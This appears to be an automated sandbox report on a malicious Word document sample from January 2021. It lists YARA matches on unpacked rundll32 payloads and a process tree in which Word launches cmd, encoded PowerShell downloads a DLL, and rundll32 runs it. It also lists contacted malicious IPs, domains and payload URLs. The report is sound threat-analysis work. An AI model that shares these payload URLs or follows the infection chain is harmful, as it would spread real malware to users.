Source: Yara match File source: 15.2.rundll32.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Behavior Graph (ID: 344134, Sample: N00048481397007.doc, Startdate: 26/01/2021, Architecture: WINDOWS, Score: 100)

Sample-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures

Process tree:
  WINWORD.EXE (started)
  cmd.exe (started)
    Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
    msg.exe (started)
    powershell.exe (started)
      DNS/IP: traumfrauen-ukraine.de 212.227.200.73, 443, 49168, 49169 ONEANDONE-ASBrauerstrasse48DE Germany; e-wdesign.eu 45.138.97.75, 49167, 80 M247GB Germany; 3 other IPs or domains
      Dropped file: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll (data)
      rundll32.exe (started)
        rundll32.exe (started)
          rundll32.exe (started)
            Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            rundll32.exe (started)
              rundll32.exe (started)
                Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                rundll32.exe (started)
                  rundll32.exe (started)
                    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                    rundll32.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
104.21.88.166 unknown United States 13335 CLOUDFLARENETUS true
192.0.78.20 unknown United States 2635 AUTOMATTICUS true
45.138.97.75 unknown Germany 9009 M247GB true
212.227.200.73 unknown Germany 8560 ONEANDONE-ASBrauerstrasse48DE true
172.217.6.174 unknown United States 15169 GOOGLEUS true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
traumfrauen-ukraine.de 212.227.200.73 true
e-wdesign.eu 45.138.97.75 true
nightlifemumbai.club 172.217.6.174 true
jflmktg.wpcomstaging.com 192.0.78.20 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true Avira URL Cloud: malware unknown
http://traumfrauen-ukraine.de/bin/JyeS/ true Avira URL Cloud: safe unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/ true Avira URL Cloud: safe unknown